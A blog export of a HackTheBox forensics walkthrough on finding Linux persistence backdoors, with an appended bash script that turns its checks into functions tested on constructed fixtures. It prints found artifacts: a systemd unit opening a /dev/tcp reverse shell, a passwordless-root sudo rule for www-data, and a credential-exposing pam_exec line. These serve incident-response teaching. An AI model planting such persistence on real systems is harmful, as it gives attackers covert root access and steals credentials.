{"id":134,"date":"2025-09-09T09:00:00","date_gmt":"2025-09-09T09:00:00","guid":{"rendered":"https:\/\/justruss.tech\/?p=134"},"modified":"2026-05-15T10:34:55","modified_gmt":"2026-05-15T10:34:55","slug":"persistenceisfutile","status":"publish","type":"post","link":"https:\/\/justruss.tech\/index.php\/2025\/09\/09\/persistenceisfutile\/","title":{"rendered":"PersistenceIsFutile | HTB Forensics (Moderate)"},"content":{"rendered":"<p>PersistenceIsFutile is a Moderate-difficulty HackTheBox forensics challenge. The scenario is a compromised Linux production server. The IR team found eight backdoors before going offline, documented nothing useful, and left you to clean the machine. There are no hints about what the backdoors are or where they are hiding.<\/p>\n<h3>Methodology<\/h3>\n<p>Finding eight unknown backdoors on a Linux system calls for systematic enumeration of every persistence mechanism rather than hunting for specific indicators. Start broad and work toward the subtle.<\/p>\n<h3>The first four: obvious locations<\/h3>\n<pre># New user accounts: anyone other than root with a login shell, and any second UID 0\ngrep -v \"nologin\\|false\" \/etc\/passwd | grep -v \"^root\"\nawk -F: '$3 == 0' \/etc\/passwd\n# backdoor:x:1001:1001::\/home\/backdoor:\/bin\/bash\n\n# Cron jobs across all users: per-user crontabs, the system crontab, cron.d and the periodic directories\nfor user in $(cut -d: -f1 \/etc\/passwd); do crontab -u $user -l 2&gt;\/dev\/null; done\ncat \/etc\/crontab \/etc\/cron.d\/* \/var\/spool\/cron\/crontabs\/* 2&gt;\/dev\/null\nls -la \/etc\/cron.hourly \/etc\/cron.daily \/etc\/cron.weekly \/etc\/cron.monthly\nsystemctl list-timers --all   # systemd timers do the same job on hosts that no longer run cron\n# Entry running \/tmp\/.hidden\/update.sh every minute\n\n# SSH authorized_keys (grep -H prefixes each key with the file it came from)\nfind \/home \/root -name authorized_keys 2&gt;\/dev\/null -exec grep -H . {} \\;\ngrep -i \"^AuthorizedKeysFile\" \/etc\/ssh\/sshd_config   # sshd can be pointed at a non-default key file\n# Unexpected public key in \/root\/.ssh\/authorized_keys\n\n# Sudo rules\ncat \/etc\/sudoers \/etc\/sudoers.d\/*\n# www-data ALL=(ALL) NOPASSWD: ALL<\/pre>\n<p>The sudo rule giving www-data full root access with no password is particularly dangerous. 
Any webshell running as www-data has an instant root escalation path.<\/p>\n<h3>The next four: less obvious<\/h3>\n<pre># SUID binaries in unexpected locations\nfind \/ -perm -4000 -type f 2&gt;\/dev\/null | grep -v \"^\/usr\/bin\\|^\/usr\/sbin\\|^\/bin\\|^\/sbin\"\n# \/opt\/support\/updater  (opens a reverse shell when executed, runs as root via SUID)\n# The path filter cannot catch a SUID copy of bash dropped into \/usr\/bin under a lookalike name;\n# for anything under the standard directories ask the package manager who owns it:\n# dpkg -S FILE (Debian) or rpm -qf FILE (RHEL). No owning package is itself a finding.<\/pre>\n<pre># Systemd service units modified recently (mtime newer than a file written at install time)\nfind \/etc\/systemd \/lib\/systemd \/usr\/lib\/systemd -name \"*.service\" -newer \/etc\/hostname 2&gt;\/dev\/null\n# touch -r resets mtime but bumps ctime, so repeat the search on ctime\nfind \/etc\/systemd \/lib\/systemd \/usr\/lib\/systemd -name \"*.service\" -cnewer \/etc\/hostname 2&gt;\/dev\/null\n# \/etc\/systemd\/system\/network-check.service\n\ncat \/etc\/systemd\/system\/network-check.service\n# ExecStart=\/bin\/bash -c 'bash -i &gt;&amp; \/dev\/tcp\/10.0.0.1\/4444 0&gt;&amp;1'<\/pre>\n<pre># PAM configuration (grep -r prefixes each line with its file name, so match only before any '#' to skip comments)\ngrep -rn \"^[^#]*\\(pam_exec\\|requisite\\|sufficient\\)\" \/etc\/pam.d\/\ndebsums -s libpam-modules   # Debian: reports a replaced pam_*.so; the config files themselves are best diffed against a known-good host of the same release\n# Modified \/etc\/pam.d\/common-auth logging credentials to \/var\/log\/.syslog<\/pre>\n<pre># Kernel modules. modinfo only resolves modules installed under \/lib\/modules\/$(uname -r),\n# so one loaded with insmod from \/tmp or \/dev\/shm comes back with no filename line.\nlsmod | awk 'NR&gt;1 {print $1}' | while read mod; do\n    if ! modinfo $mod 2&gt;\/dev\/null | grep -q \"^filename:\"; then\n        echo \"Suspicious: $mod\"\n    fi\ndone\n# A rootkit that unlinks itself from the module list vanishes from lsmod (which reads \/proc\/modules)\n# but usually keeps its \/sys\/module entry, so compare the two (initstate exists only for loadable modules)\nls -d \/sys\/module\/*\/initstate | cut -d\/ -f4 | grep -vxFf &lt;(lsmod | awk 'NR&gt;1 {print $1}')\ncat \/proc\/sys\/kernel\/tainted   # bit 12 (O, out-of-tree) or bit 13 (E, unsigned) set: a hand-built module was loaded\n# netfilter_helper is loaded but not in any installed package<\/pre>\n<p>The kernel module hooks the getdents\/getdents64 syscalls to filter its own files out of directory listings. That is why the hidden cron script and the hidden log file did not appear in ls output even though their paths were sitting in plain text in the crontab and the PAM config: only directory enumeration is hooked, so opening those paths directly still works. When a listing and a direct stat of a path disagree, trust the stat, and when in doubt mount the disk image read-only on a clean system where the rootkit is not running.<\/p>\n<h3>Key takeaway<\/h3>\n<p>Persistence hunting on Linux is an enumeration problem. Comparing installed binaries against their package checksums (debsums -c on Debian, rpm -Va on RHEL) and watching for recently changed files in system directories (find \/etc \/usr \/lib -type f -ctime -7, with the window adjusted to the incident timeline) catches a lot of what manual inspection misses. The attackers who are hardest to find modify legitimate files rather than drop new ones, and give whatever they do add names that closely resemble legitimate system components.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A walkthrough of PersistenceIsFutile on HackTheBox. Eight backdoors on a compromised Linux server with no documentation left behind. 
Systematic enumeration of persistence mechanisms from obvious to kernel-level.<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-134","post","type-post","status-publish","format-standard","hentry","category-hackthebox"],"_links":{"self":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/comments?post=134"}],"version-history":[{"count":7,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134\/revisions"}],"predecessor-version":[{"id":346,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/posts\/134\/revisions\/346"}],"wp:attachment":[{"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/media?parent=134"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/categories?post=134"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/justruss.tech\/index.php\/wp-json\/wp\/v2\/tags?post=134"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
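Added example, not code from the PersistenceIsFutile write-up or from HackTheBox: the walkthrough's text-parsing checks (non-root accounts with a login shell, NOPASSWD sudo rules, PAM stack lines that call pam_exec or a module by absolute path, and the kernel-module cross-check) written as bash functions that take file paths, so they run against constructed fixtures offline and can be pointed at /etc/passwd, /etc/sudoers, /etc/pam.d/* and lsmod/sysfs listings on a live host. The module check goes beyond the post's modinfo test by comparing the list lsmod reports against /sys/module, which is where a self-hiding module usually still shows up. All function and fixture names are this example's own, and the fixture contents are constructed, not data from the challenge box.

```bash
#!/usr/bin/env bash
# Added example, not code from the PersistenceIsFutile write-up: the text-parsing
# checks from the walkthrough as functions that take file paths, so they run
# against constructed fixtures here and against the real files on a live host.
# All function and fixture names are this example's own.

# Non-root accounts with a login shell. Field-aware version of
# grep -v "nologin\|false" /etc/passwd | grep -v "^root": tests field 7 only,
# so a GECOS or home directory containing "false" does not drop a real account.
login_shell_users() {
    awk -F: '$1 != "root" && $7 !~ /(nologin|false)$/ { print $1 }' "$@"
}

# sudoers rules that grant commands without a password. Comments and Defaults
# lines are skipped; output is "<user-or-group><TAB><rule>". Pass /etc/sudoers
# and /etc/sudoers.d/* together, as the post does.
nopasswd_sudo_rules() {
    awk '/^[[:space:]]*#/ || /^[[:space:]]*Defaults/ { next }
         /NOPASSWD:/ { print $1 "\t" $0 }' "$@"
}

# PAM stack lines worth reading by hand: anything calling pam_exec.so, or a
# module named by absolute path (stock entries name modules relative to the PAM
# module directory). Comments are stripped first; a grep -r | grep -v "^#"
# pipeline skips nothing because grep -r prefixes every line with its file name.
pam_suspicious_lines() {
    sed 's/#.*//' "$@" | grep -E 'pam_exec\.so|[[:space:]]/[^[:space:]]+\.so' || true
}

# Module names in the second list (from /sys/module) that are missing from the
# first (from lsmod). lsmod reads /proc/modules, the list a rootkit unlinks
# itself from; the /sys/module directory usually survives. On a live host build
# the two lists with:
#   lsmod | awk 'NR>1 {print $1}'                 > lsmod.txt
#   ls -d /sys/module/*/initstate | cut -d/ -f4   > sysmod.txt
# (only loadable modules have an initstate file; built-in ones would otherwise
# appear as false positives).
modules_missing_from_lsmod() {
    grep -vxFf "$1" "$2" || true
}

# Constructed fixtures (not data from the challenge box) so the checks run
# offline. Prints the directory they were written to.
make_fixtures() {
    local d
    d=$(mktemp -d)
    printf '%s\n' \
        'root:x:0:0:root:/root:/bin/bash' \
        'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin' \
        'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin' \
        'alice:x:1000:1000::/home/alice:/bin/bash' \
        'backdoor:x:1001:1001::/home/backdoor:/bin/bash' > "$d/passwd"
    printf '%s\n' \
        '# User privilege specification' \
        'Defaults env_reset' \
        'root ALL=(ALL:ALL) ALL' \
        '%sudo ALL=(ALL:ALL) ALL' \
        'www-data ALL=(ALL) NOPASSWD: ALL' > "$d/sudoers"
    printf '%s\n' \
        '# /etc/pam.d/common-auth' \
        'auth [success=1 default=ignore] pam_unix.so nullok' \
        'auth optional pam_exec.so expose_authtok /usr/local/lib/.log.sh' \
        'auth requisite pam_deny.so' \
        'auth required pam_permit.so' > "$d/common-auth"
    printf '%s\n' ext4 xfs nf_conntrack > "$d/lsmod"
    printf '%s\n' ext4 nf_conntrack netfilter_helper xfs > "$d/sysmodule"
    echo "$d"
}

# Run every check over the fixtures and print the findings.
demo() {
    local d
    d=$(make_fixtures)
    echo "== non-root accounts with a login shell"; login_shell_users "$d/passwd"
    echo "== NOPASSWD sudo rules";                  nopasswd_sudo_rules "$d/sudoers"
    echo "== PAM lines to review";                  pam_suspicious_lines "$d/common-auth"
    echo "== in /sys/module but not in lsmod";      modules_missing_from_lsmod "$d/lsmod" "$d/sysmodule"
    rm -rf "$d"
}

demo
```

Each function prints only what needs a human decision, so on a live host the output is short enough to paste into the incident notes; the passwd and sudoers checks accept several files at once, so /etc/sudoers and /etc/sudoers.d/* can be passed in one call.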